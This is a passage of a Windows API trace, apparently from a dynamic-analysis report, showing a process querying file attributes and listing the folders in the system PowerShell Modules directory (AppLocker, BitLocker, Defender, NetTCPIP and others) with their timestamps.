lpFileInformation=0x653ef8d800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0286.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d6e0) returned 1 [0286.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0286.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d720) returned 1 [0286.532] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d800 | out: lpFileInformation=0x653ef8d800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0286.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d6e0) returned 1 [0286.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6c0) returned 1 [0286.532] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d1a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0286.532] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8d3d0 | out: lpFindFileData=0x653ef8d3d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f77750 [0286.533] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.533] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0286.533] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0286.533] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0286.534] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0286.535] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0286.537] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0286.538] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x25b73f77750, lpFindFileData=0x653ef8d390 | out: lpFindFileData=0x653ef8d390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, 